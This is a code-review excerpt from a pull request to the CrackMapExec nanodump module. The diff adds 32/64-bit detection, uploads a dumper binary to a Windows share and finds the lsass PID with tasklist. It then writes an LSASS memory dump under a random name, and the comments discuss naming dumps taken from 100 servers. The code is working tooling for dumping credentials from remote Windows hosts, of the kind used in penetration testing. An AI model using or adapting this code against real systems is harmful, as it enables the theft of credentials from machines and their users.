cme/modules/nanodump.py

```diff
@@ -51,22 +65,36 @@ def options(self, context, module_options):
     def on_admin_login(self, context, connection):
         if self.useembeded == True:
             with open(self.nano_path + self.nano, 'wb') as nano:
-                nano.write(self.nano_embeded)
+                # Figure out if we're dealing with 32-bit or 64-bit Windows
+                command = 'wmic os get osarchitecture | find /v "OSArchitecture"'
+                context.log.info('Determining system architecture: {}'.format(command))
+                p = connection.execute(command, True)
+                if "32" in p:
+                    context.log.info("32-bit Windows detected.")
+                    nano.write(self.nano_embedded32)
+                elif "64" in p:
+                    context.log.info("64-bit Windows detected.")
+                    nano.write(self.nano_embedded64)
+                else:
+                    context.log.error('Unsupported Windows architecture')
+                    sys.exit(1)
     
         context.log.info('Copy {} to {}'.format(self.nano_path + self.nano, self.tmp_dir))
         with open(self.nano_path + self.nano, 'rb') as nano:
             try:
                 connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read)
                 context.log.success('Created file {} on the \\\\{}{}'.format(self.nano, self.share, self.tmp_share))
             except Exception as e:
-              context.log.error('Error writing file to share {}: {}'.format(share, e))
+              context.log.error('Error writing file to share {}: {}'.format(self.share, e))
     
         # get pid lsass
         command = 'tasklist /v /fo csv | findstr /i "lsass"'
         context.log.info('Getting lsass PID {}'.format(command))
         p = connection.execute(command, True)
         pid = p.split(',')[1][1:-1]
-        command = self.tmp_dir + self.nano + ' --pid ' + pid + ' --write ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log'
+        lower_digits = string.ascii_lowercase + string.digits
+        nano_log_name = ''.join(random.choice(lower_digits) for i in range(10)) + '.log'
```

Comment:
If I understand correctly, the name of the dump doesn't have the computername, arch and domain ? But if I dump 100 servers, it will be a pure nightmare to deal with random name dump don't you think ?

Reply:
You are absolutely correct there. I was focusing too hard on avoiding unicode in cmd through wmiexec. I implemented a new solution that gets the hostname and domain name from the connection and just uses a timestamp for the files on the victim machine. As far as I know, we are only interested in "pretty" names on our own machines.